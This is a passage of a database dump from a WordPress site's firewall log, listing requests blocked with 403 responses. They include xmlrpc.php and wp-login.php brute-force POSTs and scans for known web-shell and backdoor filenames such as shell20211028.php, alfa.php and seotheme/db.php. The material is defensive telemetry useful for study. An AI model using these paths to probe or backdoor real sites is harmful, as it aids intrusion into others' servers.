AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','5V8RaKNUpMFhcel2gQjSPf3t',0,1666019990.4687,17524,'','POST',403,0,600,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','0lfLsIWdpmonceBCYSXPykHx',0,1666020423.0632,17571,'','POST',403,0,600,0,1,'',0),('51.89.119.182',861501366,'','https://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UJCQkTtaSDHxF9BsbwGyiYoE',0,1666025439.6656,296,'','GET',403,0,700,0,1,'',0),('51.89.119.182',861501366,'','http://cteisys.com/wp-content/themes/seotheme/mar.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','vTt8bSmR5V6CudFErYfZBKas',0,1666025424.9647,12373,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wp-content/plugins/core-engine/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','M8sn4LYzNDx59ZuQJPGBpHC1',0,1666032897.2018,4517,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wp-admin/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','5fqzoCbTLBO1ZeHGSgrnQRVX',0,1666032894.4486,1559,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wp-includes/rest-api/endpoints/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ra4VFkom8hLiTxl7jWwpQtuq',0,1666032892.4304,755,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wp-content/themes/classic/inc/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ouvYwbLpCXPy1hD8rqZsa6mj',0,1666032885.2854,5765,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wp-admin/css/colors/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','I0qQzh3cNZEvMjp2exgObXr4',0,1666032882.7255,1292,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wp-admin/js/widgets/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','xd943u2i7ScBwetRhGPQOVL8',0,1666032875.9837,5466,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','eGTOy7AxblpDMWwNXH4Igrtk',0,1666032873.7818,1002,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0IUGDZxEmRvbJfldyreFQh5w',0,1666032868.8338,3828,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/css/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','EjkGOIVMwlTpfXzgiKuRbS81',0,1666032864.8143,2864,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Fgf61aSJUqls7W8u40vMNhmb',0,1666032860.4819,563,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','xCsNJiK8z1mE2tO9MRdgTpSy',0,1666032862.2395,1389,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','dTGCBD9ZEi6pwa1ezNPkcV7g',0,1666032856.6967,922,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ze90msH167hQrdZf8UbWiYSl',0,1666032858.7837,422,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','pYfFVoLgHaWjlbniCeIM5c1D',0,1666032853.3978,2070,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','L6CUQemfW7tO3RnIJ1x5pTis',0,1666032850.5230,1683,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/css/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3eONYEXt610J2LjMPDsTWmfz',0,1666032847.8234,1499,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/css/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','NcOwqGf1rodUmFT36IkQuYDB',0,1666032842.6710,783,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Lr6mXpanEjtQ3BgcbyqKwC8G',0,1666032844.6292,2008,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/years.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','PDoScsml1hrjM20WHNOiJfav',0,1666032834.4738,6838,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wp-content/themes/seotheme/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','uUsObGat2YCkd5ZLezXmqvcy',0,1666032831.6951,1550,'','GET',403,0,700,0,1,'',0),('197.242.145.205',3321008589,'','https://cteisys.com/wp-content/themes/pridmag/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','fYAGvqSjCelPUB2FN5hwWHmb',0,1666032829.1304,909,'','GET',403,0,700,0,1,'',0),('185.83.144.103',3109261415,'','https://cteisys.com/phpinfo.php.bak','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','ofhCVJaUKsYR0c1G9ButTkQI',0,1666036177.0391,10257,'','GET',403,0,700,0,1,'',0),('185.83.144.103',3109261415,'','http://cteisys.com/phpinfo.php.bak','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.129 Safari\\/537.36\"}','0ZGURrQyBtEk2mszK87PWqIg',0,1666036175.9885,11305,'','GET',403,0,700,0,1,'',0),('51.89.119.182',861501366,'','https://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','DzSNkwC8qWp5aGViKb42FZP6',0,1666035933.9525,287,'','GET',403,0,700,0,1,'',0),('51.89.119.182',861501366,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','NWDOt0Iv2f93iwApK1LbkJ7V',0,1666035915.8585,12360,'','GET',403,0,700,0,1,'',0),('20.77.97.187',340615611,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','kKcgHW5ZJGb8sIB1i0avfyFA',0,1666047405.1071,572,'','GET',403,0,700,0,1,'',0),('20.77.97.187',340615611,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','YfaL3jbtlyTAwRV7h6i9IMHe',0,1666047380.7606,8376,'','GET',403,0,700,0,1,'',0),('171.244.17.110',2884899182,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5gvahNcHMYTwf3VqI7iOeyK4',0,1666047112.4616,18831,'','POST',403,0,515,0,1,'',0),('81.68.222.69',1363467845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','K80Mdg4F2TeCuNhVmHIzEDUc',0,1666045653.9688,1727,'','POST',403,0,515,0,1,'',0),('154.6.86.21',2584106517,'','https://cteisys.com//xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.106 Safari\\/537.36\"}','bkuNJg7xtrBFeoQI6UDsjnh3',0,1666045463.7248,703,'','POST',403,0,515,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JTfPOijbwyGnvIsQMHYSmuA7',0,1666048654.2484,2168,'','POST',403,0,515,0,1,'',0),('208.109.214.179',3496859315,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GcNs27wY0elu4hT8dMEmk3O5',0,1666054824.4193,20119,'','POST',403,0,515,0,1,'',0),('124.158.12.149',2090732693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Eak0ZR1eBDlQcCGzjgdqf2S8',0,1666054029.9572,19945,'','POST',403,0,515,0,1,'',0),('162.14.71.142',2718844814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','o3tRgyY0nBF8ZQzJeATqrkO7',0,1666053233.3035,19034,'','POST',403,0,515,0,1,'',0),('18.229.212.101',317052005,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1Z4nPdTXk7NvGJoKwbOqsxDU',0,1666052441.7157,18687,'','POST',403,0,515,0,1,'',0),('123.31.21.26',2065634586,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jksiVyC6el17S3PBNXhDF5nA',0,1666058051.9923,3284,'','POST',403,0,515,0,1,'',0),('20.25.142.53',337219125,'','https://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','wHzNT59uID3gAqVp0EhLByF8',0,1666057585.1701,1451,'','GET',403,0,700,0,1,'',0),('20.25.142.53',337219125,'','http://cteisys.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','EafiXKjRq9Zr4Bv6cCWdHQt0',0,1666057556.4081,11868,'','GET',403,0,700,0,1,'',0),('198.98.60.32',3328326688,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; Trident\\/7.0; rv:11.0) like Gecko\"}','91H0QlzqGarm4StvuYyRCjBf',0,1666059358.9901,1252,'','POST',403,0,600,0,1,'',0),('157.245.166.98',2650121826,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1JMbWNHCxuDTtzvgBP0srQiR',0,1666058879.0577,2829,'','POST',403,0,515,0,1,'',0),('165.232.183.66',2783491906,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WvP9Y3JSKMsHZucy1zr5logG',0,1666068744.3443,18458,'','POST',403,0,515,0,1,'',0),('51.79.242.130',860877442,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rlx5tyLkPfBzECUG2jwN9O8d',0,1666068442.3284,18764,'','POST',403,0,515,0,1,'',0),('103.160.37.174',1738548654,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','To6MfXzOiCENrbpx5KsygP3A',0,1666067511.6722,19590,'','POST',403,0,515,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0BgrdiI7syNuDh9nV2EYU8QS',0,1666068162.4573,20179,'','POST',403,0,515,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DzH0AoFg3TOXSEfWw2aictUb',0,1666066871.2954,8276,'','POST',403,0,515,0,1,'',0),('93.113.111.193',1567715265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1k2xoAwpgC8y7fdHIUGOTEm3',0,1666066535.7414,18865,'','POST',403,0,515,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wp-content/plugins/core-engine/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','94uDKpwQdEUmjLcVnh1izryR',0,1666066283.9920,346,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wp-admin/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','7gDpj31H80Cdvos5iycuwTIY',0,1666066283.3813,309,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wp-includes/rest-api/endpoints/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','JvGfT67sSKtBYV38abEhw2CD',0,1666066282.6843,310,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wp-content/themes/classic/inc/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','sPktKLQGdx1gj75uEwhleHrI',0,1666066282.0578,302,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wp-admin/css/colors/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3x5nwHIpzVsGobF89tZjf61M',0,1666066281.1057,338,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wp-admin/js/widgets/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','GibP18LKQtDShuxwdfvngqWZ',0,1666066280.3996,315,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','6rfkp0gTDFHG1Y4qjQXvPlIZ',0,1666066279.3344,367,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','o4XpVhy8BrRCi9gNz7Tdlsef',0,1666066278.5444,309,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/css/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','WsGrHqZbS854nk10pPRhzj3e',0,1666066277.6333,318,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wikindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','xX78LPEF9iS1GhlQse4KOU5T',0,1666066276.7551,315,'','GET',403,0,700,0,1,'',0),('186.234.80.28',3135918108,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1UIfgRtVyeY4jWOX38c9rkmZ',0,1666065541.4923,9566,'','POST',403,0,515,0,1,'',0),('192.185.4.121',3233350777,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7aHZCwXyK6c0JsfqBGzgIAep',0,1666065277.9370,19673,'','POST',403,0,515,0,1,'',0),('162.240.216.162',2733693090,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ber3qG5nFT8XMLZ7lNmcODWu',0,1666064218.1634,1585,'','POST',403,0,515,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0kKDaRHs9rQZbn6WhuoTOlvN',0,1666064921.5325,18613,'','POST',403,0,515,0,1,'',0),('139.59.228.23',2335958039,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','R7sGVecBvWx5ZgEDdPKT364N',0,1666063299.0307,17490,'','POST',403,0,515,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0ZI4HDd8U7E5o3ksMVrKNlOQ',0,1666066275.8632,313,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','9AmYWreDfCwx8az0IGbXgBO5',0,1666066275.2359,305,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','dtlEmfqUG4ayQHAzjPie3LWp',0,1666066273.5228,404,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FTZUD3Hv2Xmf1Rai9MLQcyPu',0,1666066274.4031,327,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/votes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','p2qNQGOFJLAboIPVzDRcTjME',0,1666066272.7709,391,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/css/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','RKBHYgwxntATCXoqO2pWUahy',0,1666066272.0885,343,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TjACLzSgWrRqE30J8nYK5Qmc',0,1666066271.4600,300,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/css/contents.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','PTGMvdoyLFuK2QtXN0CZlUVx',0,1666066270.7186,356,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/years.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Td7BmH61SFWhUiPYsMG0aI9N',0,1666066269.9883,325,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wp-content/themes/seotheme/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','HasCEIXpAiWYfkLoGKS2c0uN',0,1666066269.3538,315,'','GET',403,0,700,0,1,'',0),('47.254.69.184',805193144,'','https://cteisys.com/wp-content/themes/pridmag/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','mu1ZT3QLAKqhPB7JYvsrjRyg',0,1666066268.7391,297,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jMXPQ23u6qKtsvBlJT7Dcb4Z',0,1666076469.2692,11644,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','epStvDHEFac94WGgPl3N5kwM',0,1666076364.5149,476,'','GET',403,0,700,0,1,'',0),('20.25.115.173',337212333,'','http://cteisys.com/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9ZcmF271SWUDwGVp3EPQdgyj',0,1666076300.1204,1295,'','GET',403,0,700,0,1,'',0),('81.88.52.210',1364735186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','o9j8gCTlrBMti7aY2W1dGLEw',0,1666072709.6070,18828,'','POST',403,0,515,0,1,'',0),('207.154.234.6',3483036166,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HnekX14L6PxZCYFSVyQKDINb',0,1666072406.3975,1619,'','POST',403,0,515,0,1,'',0),('35.225.94.95',601972319,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Xw2geDc50bojRIClUNuS1YaT',0,1666071819.1518,1410,'','POST',403,0,515,0,1,'',0),('34.84.42.54',575941174,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kFzgpsxbwe8C0YXnSdT4vc9h',0,1666072104.1507,19485,'','POST',403,0,515,0,1,'',0),('13.233.37.202',233383370,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 